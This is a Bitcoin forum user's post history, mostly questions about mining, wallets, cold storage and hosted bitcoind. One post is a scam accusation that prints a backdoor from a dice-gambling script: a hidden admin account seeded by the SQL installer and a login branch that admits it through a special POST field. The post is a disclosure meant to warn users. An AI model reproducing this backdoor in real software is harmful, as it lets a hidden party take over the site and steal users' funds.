3  Alternate cryptocurrencies / Mining (Altcoins) / A few questions on: March 02, 2015, 02:59:39 PM
Thank you for your help the other day regarding the APP SDK. my manager has downloaded some software (SGMiner) dont know how trusty SGMiner is (im not into altcoin mining) from http://miningsoftware.co/ one of the top google links but we have been unable to get it to work.

Is there any parameters we need to run after sgminer,exe? If so what would be good for an R9 290?

Cheers

4  Alternate cryptocurrencies / Mining (Altcoins) / Installing AMD APP SDK help on: February 26, 2015, 03:51:55 AM
Hi All,

I currently work as a PHP dev for a CAD company, we have over 400 computers with R9 290X and some with Firepro 16gb 9150 (Not even sure mining software supports this, does it?)

My director who is head of IT Services brought forward about mining overnight using the PC's and using it as a company leisure fund. As I have some experience with Bitcoin he asked that I look into this.

We have a slight problem however, about 30% of the PCs dont even have AMD APP SDK installed. I was wondering if anyone knew of a way to do this remotely without interaction or via a group policy of some sort?

Thanks for any help.
5  Bitcoin / Bitcoin Technical Support / Multiple Wallet System for Client Accounts on: January 23, 2015, 06:45:06 PM
Hi,

This is directly related to https://bitcointalk.org/index.php?topic=933759.0 but I wanted to keep both threads "on topic" incase of someone searching for answers.

I am curious as to what is the most efficient method of managing multiple customer accounts on a website?

I dont really want to have all funds put into a single wallet and just check the transactions to see how much funds a customer has.

Thanks for any help
6  Bitcoin / Bitcoin Technical Support / Bitcoin JSON RPC - Account has bigger balance than entire wallet? on: January 23, 2015, 03:47:12 PM
Hi,

I am looking at the account system for a client I am working with and I have made a withdrawal script which works fine and shows the amount has gone from the wallet however the amout never clears from the account?

Is this expected behaviour? is there a way I can clear the account after the withdrawal is made?

btc@accountsrv:~$ bitcoind getbalance

7  Other / Meta / the trust system is rediculous and needs to be replaced on: January 16, 2015, 03:28:53 AM
Hi All,

As you see I am a fairly new user at bitcointalk, Althought I have been mining bitcoin since 2010.

I think the bitcointalk trust system is rediculous and allows high post users to abuse the system. Even if that "high post" user is wrong or doesnt have any evidence.

I am currently watching a thread, the operator seems nice and genuine, The service has yet to do anything wrong at all but still the user has minus trust because 3 high post users have left the operator bad trust without evidence. What happened with "innocent until proven guilty"? the bitcointalk trust system is a system that uses morals from the 1800's.

Just because a user is able to post 600+ posts does not mean they are not a raving idiot. As I have seen many times. especially the users who left bad trust to the operator, I seen them posting PONZI and SCAM in size 40 font red letter and then they wonder why their post gets deleted and then complain and leave bad trust.....

I agree we need to let newbies know if someone is "suspicious" but ruining the trust rating of someone that could be genuine is going to effect their business. Is that the way the Bitcoin community want to be seen?

To be honest I am a very good PHP dev. But as much as I want to help the community and write some good software.. I know as soon as I post it (open source) I will be called a scammer, its just a joke a complete f...ing joke.

The trust system needs to be replaced before genuine people like me stop developing software and stop opening services because they are too afraid of what might happen to their reputation.

Not everyone is a scammer, maybe we should give the benefit of the doubt to most people and deal with the scammers seperately.

There must be a better system than this.
8  Economy / Service Announcements / BitGoogle.net on: January 01, 2015, 06:56:01 PM
Hi,

I have noticed the amount of absolute nonsense that is displayed when you search for specific Bitcoin related searches in google due to the way the search engine works.

Therefore I have create http://www.BitGoogle.net

Why BitGoogle.net?

Google allows me to create a custom search engine specifying "safe" domains, Like bitcointalk.org for example. You will find no Scam/Ponzi sites added to BitGoogle.net only legitimate sites deemed legitimate by YOU, Everytime I add a domain to the list I will share it in this thread first to see what people think, If it safe, it will be added, if its a possible Ponzi it will go in the sinbin!

BitGoogle.net plans to be a safe Bitcoin related search engine for everyone to use and get the results that are most relevant to you.

Hope you enjoy it.

http://www.BitGoogle.net

P.S. I have checked into laws regarding the use of the Google Name, due to me being an individual and not a company the use of the Google name is not infringing any copyright unless I deem to make money from the site, Which I do not.

I have asked this question on many forums and the same answer has came up many times.
9  Bitcoin / Project Development / Hosted bitcoind services on: January 01, 2015, 02:14:31 AM
Hi,

I was looking for some information and some solutions to hurdles I might face for my idea.

What I would like to offer

I would like to offer a hosted bitcoin daemon

Why

I see lots of people wanting to run scripts that require bitcoind on shared hosting but are unable to run the daemon themselves. I have a 4tb Dedicated Server I could host this on.

So, My Idea

User logs on to my website, sets up a daemon, with customised RPC username/pass, SSH Account with custom username/pass and customised RPC/P2P Ports they also have full access to edit their own bitcoin.conf and view their own "datadir". This will obviously cost a small fee (on a monthly basis), once confirmed I can get the scripts to setup the daemon, ssh user and send the information to the user via email.

However, I have already thought of some hurdles I will face.

1) As root, I would be able to "su" onto all these accounts, I don't want to be able to do this, I want to run a legitimate service, Is there any way I can stop this? I don't want people accusing me of stealing their bitcoins etc

2) Logging, I want to keep a log of what every SSH user does, a full audit log if you will to check if their are any accusations of stolen coins etc.

3) If the above is possible and I catch someone, How would I enforce it.

4) Is this just too much of a headache to even contemplate?

5) anything else I may face?

At the end of the day, I want users to trust my service and trust that I have all security measures taken care off

Thanks for any help you may provide.
10  Economy / Scam Accusations / Proof of Scam - felinegambler - CryptoDice and CryptoBlackjack on: December 31, 2014, 04:51:37 PM
Original Thread

https://bitcointalk.org/index.php?topic=908996.0

Outcome

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

This allows the fake admin to login and withdraw your funds, Please see solution below.

11  Bitcoin / Development & Technical Discussion / The best way to create an offline wallet? Questions. on: December 31, 2014, 04:17:31 PM
Hi,

I am in the process of creating an offline secure wallet to store my BTC. I am wondering the best way to do this? I am quite paranoid about security so would prefer the approach "the more secure the better", even if it is a pain in the backside to do.

So far I have an offline PC (Ubuntu Server, AMD R9 290)

I have the following questions.

1) What is the best software to use to create the wallet? I dont know if I trust bitcoind or bitcoincore, I am even happy to write my own software if it is more secure (what would I need to look into to do this)
2) Is there any software out there apart from what I have mentioned that can do this?
3) I understand on Linux that it will be using /dev/random and /dev/urandom, are these truly random enough or is it worth investing in a hardware RNG? (http://www.entropykey.co.uk/)
4) is there anything else I should take into account, I am going to print it and have a copy of the private key in my safe and in my parents safe, No-one has access to this apart from them.

Thanks for any help.

13  Economy / Service Discussion / Cloud Mining Question on: December 28, 2014, 07:00:15 PM
Hi,

I would like some advice on cloud mining.

After initial capital I cannot understand the business model of a cloud mining company, surely if you make your ROI in 3 months or something they start to lose money after this period.

why would any company open that knows its going to lose money in the long term? Unless they have an ulterior motive?

I am tempted to try out some cloud mining sites that have been around for a while as It seems easier than me buying some of my own miners but I am putting the trust in someone elses hands.

Has anyone invested a lot in cloud mining and come out on top? Any examples or anyone here who has?

Thanks for any advice
14  Bitcoin / Bitcoin Discussion / Hardware Wallets/Cold Storage - Best Option? on: December 27, 2014, 09:09:41 PM
Hi, I have read some reviews on site and had a look around for info, There is plenty off it but so many mixed reviews.

I am wondering the best way for cold storage? What is the safest way?

I was personally thinking about just writing down the private key on paper and ensuring that I dont lose it, having a copy at my house and a copy at my parents (who know nothing of bitcoin) and deleting the digital wallet, This way my coins can not be stolen by some scammer.

Does that sound like a good option to people. As I am just hoarding my BTC until the price goes up and dont want to spend any.
